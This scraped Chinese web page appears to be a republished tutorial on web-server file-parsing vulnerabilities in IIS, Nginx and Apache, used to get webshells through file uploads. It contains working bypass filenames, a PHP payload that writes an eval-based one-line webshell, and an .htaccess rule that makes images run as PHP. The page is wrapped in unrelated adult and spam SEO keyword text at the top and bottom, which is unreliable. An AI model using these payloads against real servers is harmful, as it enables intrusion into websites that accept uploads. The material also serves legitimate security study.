成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

解析漏洞總結(jié)

安全 漏洞
IIS 6.0解析利用方法有兩種,目錄解析和文件解析。

一、IIS 5.x/6.0解析漏洞

IIS 6.0解析利用方法有兩種

1.目錄解析

/xx.asp/xx.jpg

2.文件解析

wooyun.asp;.jpg

第一種,在網(wǎng)站下建立文件夾的名字為 .asp、.asa 的文件夾,其目錄內(nèi)的任何擴展名的文件都被IIS當作asp文件來解析并執(zhí)行。

例如創(chuàng)建目錄 wooyun.asp,那么/wooyun.asp/1.jpg將被當作asp文件來執(zhí)行。假設(shè)黑闊可以控制上傳文件夾路徑,就可以不管你上傳后你的圖片改不改名都能拿shell了。

第二種,在IIS6.0下,分號后面的不被解析,也就是說wooyun.asp;.jpg會被服務(wù)器看成是wooyun.asp還有IIS6.0 默認的可執(zhí)行文件除了asp還包含這三種:

/wooyun.asa

/wooyun.cer

/wooyun.cdx

二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

Nginx解析漏洞這個偉大的漏洞是我國安全組織80sec發(fā)現(xiàn)的…

在默認Fast-CGI開啟狀況下,黑闊上傳一個名字為wooyun.jpg,內(nèi)容為:<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>的文件,然后訪問wooyun.jpg/.php,在這個目錄下就會生成一句話木馬 shell.php。

三、Nginx <8.03 空字節(jié)代碼執(zhí)行漏洞

影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在圖片中嵌入PHP代碼然后通過訪問

xxx.jpg%00.php

來執(zhí)行其中的代碼

四、Apache解析漏洞

Apache 是從右到左開始判斷解析,如果為不可識別解析,就再往左判斷.

比如 wooyun.php.owf.rar “.owf”和”.rar” 這兩種后綴是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php.

如何判斷是不是合法的后綴就是這個漏洞的利用關(guān)鍵,測試時可以嘗試上傳一個wooyun.php.rara.jpg.png…(把你知道的常見后綴都寫上…)去測試是否是合法后綴

五、其他

在windows環(huán)境下,xx.jpg[空格] 或xx.jpg. 這兩類文件都是不允許存在的,若這樣命名,windows會默認除去空格或點,黑客可以通過抓包,在文件名后加一個空格或者點繞過黑名單.若上傳成功,空格和點都會被windows自動消除,這樣也可以getshell。

如果在Apache中.htaccess可被執(zhí)行.且可被上傳.那可以嘗試在.htaccess中寫入:

<FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>

然后再上傳shell.jpg的木馬, 這樣shell.jpg就可解析為php文件

責任編輯:藍雨淚 來源: 紅黑聯(lián)盟
相關(guān)推薦

2013-06-25 10:11:18

2013-11-29 15:41:08

解析漏洞ApacheApache解析漏洞

2011-07-01 10:42:51

IIS解析漏洞

2010-09-16 15:17:33

2020-10-29 15:26:03

Web安全文件解析漏洞網(wǎng)絡(luò)安全

2023-06-11 17:24:26

2020-07-24 10:31:34

未授權(quán)訪問漏洞

2015-02-26 10:24:25

2011-07-01 10:22:09

麥咖啡IIS解析漏洞

2015-03-13 10:06:55

2011-01-20 17:53:56

2018-09-19 04:55:22

2021-12-26 19:04:51

漏洞Logback系統(tǒng)

2022-03-10 09:41:15

漏洞Linux內(nèi)核

2022-12-08 10:33:48

2024-01-17 11:24:03

2010-05-21 10:02:56

2015-01-29 11:47:35

2014-09-26 15:41:51

2017-11-08 10:20:10

點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 亚洲视频一区二区三区 | 国产亚洲www | 久久黄视频 | 亚洲一区二区在线视频 | 久久电影一区 | 国产1区 | 中文一区二区 | 成人精品在线观看 | 亚洲欧美精品 | 青娱乐国产 | 国产黄a一级 | 色香婷婷 | 欧美在线视频网 | 91视频网址 | 黄网免费看 | 伊人网站视频 | 国产精品爱久久久久久久 | 午夜精品久久久久久久 | 亚州精品天堂中文字幕 | 免费观看一级特黄欧美大片 | 国产成人精品一区二区 | 秋霞电影一区二区三区 | 国产精品色 | 一本色道精品久久一区二区三区 | 久久999| 久久久国产精品 | 国产97在线视频 | 国产精品久久久亚洲 | 99久久免费观看 | 美女天天操| 国产视频中文字幕 | 欧美日在线 | 国产伦精品 | 免费a v网站 | 免费亚洲成人 | 欧美日韩综合视频 | 欧美日韩在线观看一区二区三区 | 91n成人| 亚洲成人免费 | 日本高清精品 | 色.com|